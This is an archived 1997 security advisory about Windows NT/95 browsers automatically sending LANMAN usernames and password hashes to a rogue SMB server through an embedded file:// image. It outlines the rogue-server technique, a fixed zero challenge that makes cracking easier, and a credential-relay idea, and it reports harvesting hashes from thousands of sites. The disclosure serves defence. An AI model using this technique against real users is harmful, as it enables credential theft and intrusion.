WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4)
|Description:||Win95 will automatically try to authenticate the logged in user to an SMB server. Thus (through a web page, in this example), you can direct people to the server and then grab their username and "encrypted" LANMAN password.|
|Author:||Aaron Spangler <pokee@MAXWELL.EE.WASHINGTON.EDU>|
|Compromise:||Obtain LANMAN hashed passwords (remote)|
|Vulnerable Systems:||Win95, WinNT 3.51 & 4.0|
|Date:||14 March 1997|
[Note this is edited from http://www.ee.washington.edu/computing/iebug The actual exploit has been changed to 127.0.0.1 to avoid him narfing your password -Fyodor]
Internet Explorer Exploit #4IE BUG #4 was discovered by Aaron Spangler. First posted Mar 14,1997
This page has been visited times since noon Friday Mar 14th!
Internet Explorer 3.02 & 4.0 for NT are still Vulnerable! - March 25th
SO FAR WE HAVE COLLECTED PASSWORDS FROM 2473* UNIQUE SITES SINCE FRIDAY Mar 14th!
550* were crackable within less than 5 minutes*Numbers are as of passwords collected since Mar 28. This page has not been updated since because I have been out from work. We just had a new baby son and because of complications with him and mom, I will not be updating this page for at least a week.
Your favorite web browser may be giving out more information than you want it to. Including your Username and information about your Password.
Known Versions Affected:The exploit works for both Netscape Navigator 3.01 and Microsoft Internet Explorer 3.01 (even with Security Patches.) (earlier versions should work as well, but have not yet been tested). But you MUST be using Windows NT 4.0 or Windows 97. Look below to see how it works.
So far I have been able to confirm this bug on the following test benches:
- Windows 97 Beta (memphis) - Netscape Communicator 4.0 Preview beta 2
- Windows 97 Beta (memphis 4.10.1351) - Netscape Navigator 3.0
- Windows 97 Beta (memphis 4.10.1387) - Internet Explorer 3.01 (with the 3 patches in one)
- Windows NT 3.51 Workstation - Netscape Communicator Preview Release 2
- Windows NT 3.51 Workstation - Netscape Navigator 3.01
- Windows NT 4.0 Server Service Patch 1 - Internet Explorer 3.02
- Windows NT 4.0 Server Service Patch 1 - Internet Explorer 3.01B (build 1215 - 128big)
- Windows NT 4.0 Server Service Patch 2 - Internet Explorer 3.01B (with the 3 patches in one)
- Windows NT 4.0 Server Service Patch 2 - Netscape Navigator 3.01p
- Windows NT 4.0 Server Service Patch 2 - Internet Explorer 3.02 (Even with latest one from Microsoft)
- Windows NT 4.0 Server Service Patch 2 - Internet Explorer 4.0 Beta build 544
- Windows NT 4.0 Server (no service patch) - Internet Explorer 3.01A (with only first patch)
- Windows NT 4.0 Server (no service patch) - Netscape Communicator 4.0 (preview)
- Windows NT 4.0 Workstation (no service patch) - Netscape Navigator 3.01 Gold
- Windows NT 4.0 Workstation Service Patch 1 - Netscape Navigator 3.0
- Windows NT 4.0 Workstation Service Patch 1 - Netscape Navigator 3.01
- Windows NT 4.0 Workstation Service Patch 2 - Internet Explorer 3.01B (with the 3 patches in one)
- Windows NT 4.0 Workstation Service Patch 2 - Internet Explorer 3.02 (Even with latest one from Microsoft)
- Windows NT 4.0 Workstation Service Patch 2 - Internet Explorer 4.0 Beta build 544
- Windows NT 4.0 Workstation Service Patch 2 - Netscape Communicator Preview beta 2
- Windows NT 4.0 Workstation Service Patch 2 - Netscape Communicator 4.0 PR 2
- Windows NT 4.0 Workstation Service Patch 2 - Netscape Communicator Pro PR 2
- Windows NT 4.0 Workstation Service Patch 2 - Netscape Navigator 3.01
- Windows 95 (SP1) with Netware drivers - Netscape Navigator 3.X (it worked for one individual, not supposed to)
- Windows 95 (OSR2) with Netware drivers - Internet Explorer 3.0 (4.70.1215 worked for one individual)
- Windows 95 (4.00.950a) with Netware drivers - Netscape Version 3.0-962223 (worked for one)
- Windows 95 (4.00.950a) with Netware drivers - Internet Explorer 3.0 (4.70.1158) (worked for one)
- Windows 95 with Netware drivers - Internet Explorer 3.01b (worked for one)
- Windows 95 Service Pack 1 with Netware drivers - Internet Explorer 3.02
If you see multicolored (blue,green,yellow) text below, then you are vulnerable.
Picture for file://\\server\share\image.gif:
Picture for file:////server/share/image.gif:
How it Works:
Web page that points to a Rogue SMB ServerThis web pages contains an embedded image (actually two). The embedded images do not reside in this same directory as this web page. In fact, they reside on a SMB Lanman server (as opposed to an HTTP server). (View the source for this html to get a better idea what I am talking about). I borrowed this idea from the Last MS Internet Explorer Security Exploit.
The modified SMB ServerIn order for the client to download the images, the client needs to 'logon' to the Lanman server. Windows NT seems to do this without even asking the user for confirmation. Windows NT simply forwards the username and encrypted version of the user's password to the Lanman server. The Lanman server code has been modified slightly to record Usernames and "Hashed Passwords" of the victims. Also the code has been modified to supply the client with a fixed "Challenge seed value" for password encryption. (Thus making it even easier to decode the client passwords in the future.) See NT Password Dictionary Attack for where I got the Lanman server idea.
What's the big deal?First of all, no remote web site should be able to record your username. If they do, then can compile junk email lists and sell your name. Secondly, if they have information on what your password might be, and they know what site you came from, they can gain access to your computer or local account. (Thus compromising your security with you never knowing about it.) It is fairly easy to unencrypt a MS password if the challenge has set to zero via dictionary attacks. Sequential search brute force attacks work as well if you can guess what types of characters are most common in the password. Yes, it is time consuming, but if your account gets hacked, is it really worth it? It is interesting to note that in theory someone could setup a Lanman server that make a simultaneous connection back to the client as a connection comes in. By simply relaying the same challenge and password back to the client, the remote server could gain network access to the vulnerable client.
Did you really get my username & hashed password?Take a look at the log so far. Remember these passwords are easier to unencrypt because the challenge response is set to all zeros! If your client connects with a plaintext password, I do NOT show it in the logs, although some machines have been connecting with non encrypted passwords. Also I do not show the entire encrypted password in the log to protect the user. Notice that the most common account & password I get is "Administrator".
IE BUG #4 was discovered by Aaron Spangler. First posted Mar 14,1997
- New York Times Newspaper - Take a look at the Cyber Times Section
- KNWX 770 AM All news radio broadcasted throughout Saturday March 22
- New Fix is Still Vulnerable. Has not even been fixed yet! - March 25th
- Wired.com - Good article.
- BrowserWatch (iWorld)
- NEWS.COM -March 20th
- Pipeline News - March 20th
- More Pipeline News - March 27th
- NTsecurity News
- W.W.W. Security FAQ
- Unoffical MS Internet Explorer Security FAQ
- Even News in Germany...
- NETSURFER Digest
- IE Bug #1 .url/ .lnk files - Paul Greene
- IE Bug #2 Programs from web without asking - David Ross
- IE Bug #3: .isp files - Chris Rioux & Tim Machinta
- IE Bug #4: (This page) - Aaron Spangler
- IE Bug #5: Similar Exploit but uses NTLM instead of SMB - Paul Ashton
- IE Bug #6: Windows 95 and MSIE Security Hole - Steve Birnbaum
Mirrors of this Page
- A mirror of this page - The NT Shop
- A mirror of this page - Coming soon
- A mirror of this page
DisclaimerAaron Spangler and the University of Washington will not be held liable for any damage caused from/by this page. This page was setup merely to demonstrate that there is a significant security hole and that Microsoft needs to fix it. If your password is grabbed, CHANGE YOUR PASSWORD IMMEDIATELY!
The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
|ULTRIX/Digital UNIX||HP/UX||SCO||Remote exploits|
This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: